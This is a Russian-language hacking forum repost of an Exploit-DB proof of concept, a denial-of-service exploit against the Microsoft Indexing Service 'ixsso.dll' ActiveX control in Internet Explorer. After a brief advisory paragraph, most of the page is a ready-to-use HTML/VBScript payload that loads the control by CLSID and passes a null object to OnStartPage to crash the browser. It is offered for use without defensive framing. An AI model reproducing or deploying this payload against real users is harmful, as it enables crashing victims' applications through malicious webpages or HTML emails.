Exploit Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37673
Проверка EDB
  1. Пройдено
Автор
COOLKAVEH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2012-08-24
Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service
HTML:
source: https://www.securityfocus.com/bid/55202/info

Microsoft Indexing Service 'ixsso.dll' ActiveX control is prone to a denial-of-service vulnerability due to a null-pointer dereference error.

An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.

The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed. 

<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script>
 
Источник
www.exploit-db.com

Похожие темы